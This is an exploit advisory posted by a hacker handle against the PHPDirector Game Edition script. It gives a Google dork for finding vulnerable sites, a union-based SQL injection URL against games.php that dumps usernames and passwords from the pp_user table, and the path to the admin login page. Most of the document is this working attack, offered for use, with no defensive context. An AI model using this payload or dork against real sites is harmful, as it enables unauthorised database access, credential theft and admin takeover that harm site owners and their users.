PHPDirector Game Edition (game.php) Sql Injection Vulnerability ================================================================ #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://scriptsgratuits.info/Scripts/PHP/Jeux/PHPDirector-Game-Edition_7.html .:. Dork : "Powered by PHPD Game Edition" .:. Home : www.Hack-Book.com .:. Gr34T$ T0 [h1ch4m] & [Risky] & [ZaIdOoHxHaCkEr] & [The Sword] #################################################################### ===[ Exploit ]=== www.site.com/games.php?id=null[Sql Injection] www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+pp_user ===[ Admin Panel ]=== www.site.com/admin/login.php ####################################################################